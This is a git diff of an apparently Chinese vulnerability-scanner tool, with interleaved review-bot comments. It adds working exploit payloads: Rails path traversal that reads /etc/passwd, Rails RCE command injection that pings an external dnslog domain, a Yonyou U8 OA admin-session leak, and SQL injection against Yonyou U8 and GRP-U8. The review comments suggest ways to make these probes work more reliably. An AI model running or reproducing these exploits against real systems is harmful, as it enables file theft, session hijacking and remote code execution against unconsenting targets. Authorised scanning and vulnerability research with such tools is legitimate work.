攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'File-Read' + vul_info['vul_id'] = 'CVE-2018-3760' + vul_info['vul_method'] = 'GET' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in range(len(self.cve_2018_3760_payloads)): + path = self.cve_2018_3760_payloads[payload]['path'] + target = url + path + + vul_info['path'] = path + vul_info['target'] = target + + load_path_re = r'<h2>.* is no longer under a load path: .*/.{0,30}</h2>' + + try: + if (payload % 2 == 0): + res1 = requests.get( # * 获取允许的路径(路径白名单) + target, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res1.status_code, res1) # * LOG + + load_path_search = 
re.search(load_path_re, res1.text, re.I|re.M|re.U|re.S) + if load_path_search: + path = self.cve_2018_3760_payloads[payload+1]['path'] + + load_path_s = load_path_search.group(0).lstrip('<h2>').rstrip('</h2>') + load_path_s = load_path_s.replace('/etc/passwd is no longer under a load path: ', '') + load_path_s = load_path_s.replace('C:/Windows/System32/drivers/etc/hosts is no longer under a load path: ', '') + load_path_list = load_path_s.split(', ') + + for load_path in load_path_list: + sleep(0.5) + target = url + path.format(load_path) + + res2 = requests.get( + target, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res2.status_code, res2) # * LOG + + if (('/sbin/nologin' in res2.text) + or ('root:x:0:0:root' in res2.text) + or ('Microsoft Corp' in res2.text) + or ('Microsoft TCP/IP for Windows' in res2.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res2 + } + return results + else: + continue + else: + continue + + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + def cve_2019_5418_scan(self, url): + ''' 在控制器中通过render file形式来渲染应用之外的视图, 且会根据用户传入的Accept头来确定文件具体位置 + 通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞, 读取任意文件 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'File-Read' + vul_info['vul_id'] = 'CVE-2019-5418' + vul_info['vul_method'] = 'GET' + + for payload in self.cve_2019_5418_payloads: + path = payload['path'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=headers, + 
proxies=self.proxies, + verify=False, + allow_redirects=False + ) + + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def cve_2020_8163_scan(self, url): + ''' 在 Rails 5.0.1 之前版本中的一个代码注入漏洞, + 它允许攻击者控制"render"调用"locals"参数执行RCE + ''' + sessid = '2892b92d3c3a1d8b4ab069947ddbc552' + + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2020-8163' + vul_info['vul_method'] = 'GET' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.cve_2020_8163_payloads: + md = random_md5() # * 随机md5值, 8位 + dns_domain = md + '.' 
+ dns.domain(sessid) # * dnslog/ceye域名 + + path = payload['path'].replace('DNSdomain', dns_domain) + target = url + path + + vul_info['path'] = path + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (md in dns.result(md, sessid)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.cve_2018_3760_scan, url=url), + thread(target=self.cve_2019_5418_scan, url=url), + thread(target=self.cve_2020_8163_scan, url=url) + ] + +rails = RubyOnRails() diff --git a/payloads/Spring.py b/payloads/Spring.py index 75c8c3b..a8a4148 100644 --- a/payloads/Spring.py +++ b/payloads/Spring.py @@ -290,7 +290,11 @@ def cve_2021_21234_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)): + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], diff --git a/payloads/Yonyou.py b/payloads/Yonyou.py index a377ccc..e016143 100644 --- a/payloads/Yonyou.py +++ b/payloads/Yonyou.py 
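Review bot: In `cve_2018_3760_scan` the load path is trimmed with `lstrip('<h2>')` and `rstrip('</h2>')`, which strip any run of the characters `<`, `h`, `2`, `>`, `/` rather than the tags, so a load path that happens to end in `h`, `2` or `/` is truncated and the traversal URL built from it is wrong; slice the match instead, `load_path_s = load_path_search.group(0)[len('<h2>'):-len('</h2>')]`, and replace the greedy `.*` in `load_path_re` (used with `re.S`) by `[^<]*` so it cannot run into a later tag. The `cve_2020_8163_payloads` list fires three commands on the target, and the last one, `ping DNSdomain` with no count, runs until killed on a Linux host if the earlier probes produced no DNS hit — the scanner side merely sees a timeout while a Rails worker stays busy; either bound it (`ping -n 4` is the Windows form it appears to be aiming at) or only try it when the `-c 4` variant was rejected. `from json import load` is unused as far as this diff shows, and the `C:\Windows\...` Accept header in `cve_2019_5418_payloads` is a plain string with `\W`/`\S` invalid escapes — use a raw string.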
@@ -3,18 +3,36 @@ ''' Yonyou扫描类: - 用友NC BeanShell远程命令执行漏洞 + 1. 用友NC BeanShell远程命令执行漏洞 CNVD-2021-30167 - 用友ERP-NC NCFindWeb接口任意文件读取/下载/目录遍历 + + 2. 用友ERP-NC NCFindWeb接口任意文件读取/下载/目录遍历 + 暂无编号 + + 3. 用友U8 OA getSessionList.jsp 敏感信息泄漏 + 暂无编号 + Payload: https://blog.csdn.net/qq_41617034/article/details/124268004 + + 4. 用友U8 OA test.jsp SQL注入 暂无编号 + Payload: https://blog.csdn.net/qq_41617034/article/details/124268004 + + 5. 用友GRP-U8 Proxy SQL注入 + CNNVD-201610-923 + Payload: https://blog.csdn.net/qq_41617034/article/details/124268004 + + ''' +from lib.api.dns import dns from lib.initial.config import config -from lib.tool.md5 import md5 +from lib.tool.md5 import md5, random_md5 from lib.tool.logger import logger from lib.tool.thread import thread from lib.tool import check from thirdparty import requests +from time import sleep +import re class Yonyou(): def __init__(self): 
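Review bot: `dns`, `random_md5` and `sleep` are newly imported here, but none of the three scan methods added later in this diff (`yonyou_u8_oa_getsession_scan`, `yonyou_u8_oa_test_sqlinject_scan`, `cnnvd_201610_923_scan`) uses them — only `re` is needed; unless a part of the file not shown here relies on them, drop the unused imports so the dependency list reflects what the module does. The header lists item 5 as "Proxy SQL注入" while the method docstring further down calls CNNVD-201610-923 an XXE; the request carries a raw SQL statement in the XML `Data` parameter, so describe it consistently as SQL injection via that parameter in both places.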
@@ -38,6 +56,39 @@ def __init__(self): } ] + self.yonyou_u8_oa_getsession_payloads = [ + { + 'path': 'yyoa/ext/https/getSessionList.jsp?cmd=getAll', + 'data': '' + }, + { + 'path': 'getSessionList.jsp?cmd=getAll', + 'data': '' + } + ] + + self.yonyou_u8_oa_test_sqlinject_payloads = [ + { + 'path': 'yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))', + 'data': '' + }, + { + 'path': 'test.jsp?doType=101&S1=(SELECT%20MD5(1))', + 'data': '' + } + ] + + self.cnnvd_201610_923_payloads = [ + { + 'path': 'Proxy', + 'data': 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>' + }, + { + 'path': 'Proxy', + 'data': 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>' + } + ] + def cnvd_2021_30167_scan(self, url): ''' 用友NC BeanShell远程命令执行漏洞 给了一个命令执行的页面, 在框框内输入命令, 然后点击按钮就可以运行任意代码 
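Review bot: Both `cnnvd_201610_923_payloads` entries hand the raw `cVer=9.8.0&dp=<?xml ...>` string to `requests.post(data=...)`, so `<`, `>`, `"`, `=` and (in the second entry) spaces are sent unencoded and no Content-Type is set unless `self.headers` happens to supply one; building the body as a dict, `'data': {'cVer': '9.8.0', 'dp': '<?xml version="1.0" ... </R9PACKET>'}`, lets requests form-encode it correctly and the consuming `requests.post(..., data=data)` call needs no change. The second entry also selects `user, db_name(), host_name()` alongside `@@version`, while the detection below only looks for the SQL Server version banner; a probe should pull the minimum it needs, so keep `select @@version` — after which the two entries differ only in whitespace and one suffices. For the `test.jsp` payloads a short comment that `S1=(SELECT MD5(1))` is expected to echo `md5('1')` back would tie the payload to the hash the scan method compares against.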
@@ -148,6 +199,155 @@ def yonyou_nc_fileRead_scan(self, url):
             }
             return results
 
+    def yonyou_u8_oa_getsession_scan(self, url):
+        ''' 通过该漏洞, 攻击者可以获取数据库中管理员的账户信息以及session, 可利用session登录相关账号 '''
+        vul_info = {}
+        vul_info['app_name'] = self.app_name + 'U8-OA'
+        vul_info['vul_type'] = 'DSinfo'
+        vul_info['vul_id'] = 'Yonyou-u8-getSessionList-unAuth'
+        vul_info['vul_method'] = 'GET'
+        vul_info['headers'] = {}
+
+        # headers = self.headers.copy()
+        # headers.update(vul_info['headers'])
+
+        for payload in self.yonyou_u8_oa_getsession_payloads:
+            path = payload['path']
+            target = url + path
+
+            vul_info['path'] = path
+            vul_info['target'] = target
+
+            try:
+                res = requests.get(
+                    target,
+                    timeout=self.timeout,
+                    headers=self.headers,
+                    proxies=self.proxies,
+                    verify=False,
+                    allow_redirects=False
+                )
+                logger.logging(vul_info, res.status_code, res) # * LOG
+            except requests.ConnectTimeout:
+                logger.logging(vul_info, 'Timeout')
+                return None
+            except requests.ConnectionError:
+                logger.logging(vul_info, 'Faild')
+                return None
+            except:
+                logger.logging(vul_info, 'Error')
+                return None
+
+            session_re = r'([0-9A-Z]{32})+'
+            if (re.search(session_re, res.text, re.M|re.U)):
+                results = {
+                    'Target': target,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+
+    def yonyou_u8_oa_test_sqlinject_scan(self, url):
+        ''' 由于与致远OA使用相同的文件, 于是存在同样的漏洞 '''
+        vul_info = {}
+        vul_info['app_name'] = self.app_name + 'U8-OA'
+        vul_info['vul_type'] = 'SQLinject'
+        vul_info['vul_id'] = 'Yonyou-u8-test.jsp-sqlinject'
+        vul_info['vul_method'] = 'GET'
+        vul_info['headers'] = {}
+
+        # headers = self.headers.copy()
+        # headers.update(vul_info['headers'])
+
+        for payload in self.yonyou_u8_oa_test_sqlinject_payloads:
+            path = payload['path']
+            target = url + path
+
+            vul_info['path'] = path
+            vul_info['target'] = target
+
+            try:
+                res = requests.get(
+                    target,
+                    timeout=self.timeout,
+                    headers=self.headers,
+                    proxies=self.proxies,
verify=False,
+                    allow_redirects=False
+                )
+                logger.logging(vul_info, res.status_code, res) # * LOG
+            except requests.ConnectTimeout:
+                logger.logging(vul_info, 'Timeout')
+                return None
+            except requests.ConnectionError:
+                logger.logging(vul_info, 'Faild')
+                return None
+            except:
+                logger.logging(vul_info, 'Error')
+                return None
+
+            if ('c4ca4238a0b923820dcc509a6f75849b' in res.text):
+                results = {
+                    'Target': target,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+
+    def cnnvd_201610_923_scan(self, url):
+        '''
+        用友GRP-u8存在XXE漏洞, 该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载, 导致可加载外部SQL语句
+        '''
+        vul_info = {}
+        vul_info['app_name'] = self.app_name + 'GRP-U8'
+        vul_info['vul_type'] = 'SQLinject/RCE'
+        vul_info['vul_id'] = 'CNNVD-201610-923'
+        vul_info['vul_method'] = 'POST'
+        vul_info['headers'] = {}
+
+        # headers = self.headers.copy()
+        # headers.update(vul_info['headers'])
+
+        for payload in self.cnnvd_201610_923_payloads:
+            path = payload['path']
+            data = payload['data']
+            target = url + path
+
+            vul_info['path'] = path
+            vul_info['data'] = data
+            vul_info['target'] = target
+
+            try:
+                res = requests.post(
+                    target,
+                    timeout=self.timeout,
+                    headers=self.headers,
+                    data=data,
+                    proxies=self.proxies,
+                    verify=False,
+                    allow_redirects=False
+                )
+                logger.logging(vul_info, res.status_code, res) # * LOG
+            except requests.ConnectTimeout:
+                logger.logging(vul_info, 'Timeout')
+                return None
+            except requests.ConnectionError:
+                logger.logging(vul_info, 'Faild')
+                return None
+            except:
+                logger.logging(vul_info, 'Error')
+                return None
+
+            version_re = r'column[1-4]{1}="Microsoft SQL Server \d{1,5} -.*Copyright.*Microsoft Corporation.*"'
+
+            if (re.search(version_re, res.text, re.I|re.M|re.S|re.U)):
+                results = {
+                    'Target': target,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+
     def addscan(self, url, vuln=None):
         if vuln:
             return
eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
@@ -155,6 +355,9 @@ def addscan(self, url, vuln=None):
         return [
             thread(target=self.cnvd_2021_30167_scan, url=url),
             thread(target=self.yonyou_nc_fileRead_scan, url=url),
+            thread(target=self.yonyou_u8_oa_getsession_scan, url=url),
+            thread(target=self.yonyou_u8_oa_test_sqlinject_scan, url=url),
+            thread(target=self.cnnvd_201610_923_scan, url=url)
         ]
 
 yonyou = Yonyou()
\ No newline at end of file
diff --git a/payloads/demo.py b/payloads/demo.py
index 3567287..21737f4 100644
--- a/payloads/demo.py
+++ b/payloads/demo.py
@@ -6,6 +6,7 @@ XXXXX
 未开启强制路由RCE
 CNVD-2018-24942
 file:///etc/passwd
+file:///C:/Windows/System32/drivers/etc/hosts
 file:///C:\Windows\System32\drivers\etc\hosts
 '''
diff --git a/payloads/demo2.py b/payloads/demo2.py
index d3fc0b0..ba06c7d 100644
--- a/payloads/demo2.py
+++ b/payloads/demo2.py
@@ -6,8 +6,8 @@ XXXXX
 未开启强制路由RCE
 CNVD-2018-24942
 file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
 file:///C:/Windows/System32/drivers/etc/hosts
+file:///C:\Windows\System32\drivers\etc\hosts
 '''
 from lib.api.dns import dns
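Review bot: `session_re = r'([0-9A-Z]{32})+'` in `yonyou_u8_oa_getsession_scan` matches any 32-character run of digits and capital letters anywhere in the body, and the status code is never examined, so an error page or a template carrying an asset hash or CSRF token of that shape is reported as a finding. Gate on the status first and bound the token, e.g. `if res.status_code == 200 and re.search(r'\b[0-9A-Z]{32}\b', res.text):`; the trailing `+` on the group adds nothing, since one 32-character run already satisfies the pattern. The bare `except:` in all three new methods also swallows `KeyboardInterrupt` and `SystemExit` and logs them as `'Error'`; `except Exception:` keeps the intended catch-all without hiding an operator's interrupt. The literal `c4ca4238a0b923820dcc509a6f75849b` in `yonyou_u8_oa_test_sqlinject_scan` deserves a comment such as `# MD5('1'): must match the S1=(SELECT MD5(1)) probe defined in __init__`.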